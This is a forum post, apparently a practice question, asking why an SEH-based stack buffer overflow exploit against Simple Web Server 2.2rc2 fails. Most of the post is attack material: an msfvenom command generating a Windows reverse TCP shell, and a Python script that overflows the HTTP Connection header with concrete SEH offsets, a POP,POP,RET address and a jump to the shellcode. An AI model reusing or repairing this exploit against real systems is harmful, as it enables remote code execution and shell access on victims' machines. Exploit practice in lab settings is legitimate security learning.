24Oca
Stack Buffer Overflow using SEH in Simple Web Server 2.2rc2
I am practicing writing exploit for Simple Web Server 2.2rc2. I was able to:
- find proper offset to overwrite SE Handler and Next SEH
- find POP,POP,RET address
My problem is that, I can't execute my shell (generated by msfvenom:
msfvenom --platform windows -a x86 -p windows/shell_reverse_tcp LHOST=IP LPORT=80 EXITFUNC=thread -b "\x00\x0a\x0d" -f python -v shellcode
I have tried to:
- place my code directly after SE Handler
- prepend shellcode with stack adjustment
- adding nopsled before shellcode
All I see in debugger is that, my shellcode crash app.
Here is my current code:
#!/usr/bin/python
import socket,struct,os
ip = "192.168.123.2"
port = 80
rsp_offset = 2048
seh_offset = 2280
buf_size = 2400
#shellcode= # generated by msfvenom
buf = ""
buf+= "A" * (rsp_offset-len(buf))
buf+= "BBBB" # EIP
buf+= "C" * (seh_offset-len(buf))
buf+= "\xeb\x07\x90\x90" # Next SEH: JMP +7 to shellcode
buf+= struct.pack("<I", 0x6FC5447E) # POP,POP,RET
buf+= "\x90\x83\xec\x20" # stack adjustment
buf+= shellcode
#buf+= "F" * (buf_size-len(buf))
req = "GET / HTTP/1.1\r\n"
req += "Host: 192.168.122.2\r\n"
req += "Connection:" + buf + "\r\n"
req += "\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(req)
s.close()
Can someone give me a hint, what I am doing wrong? App is available here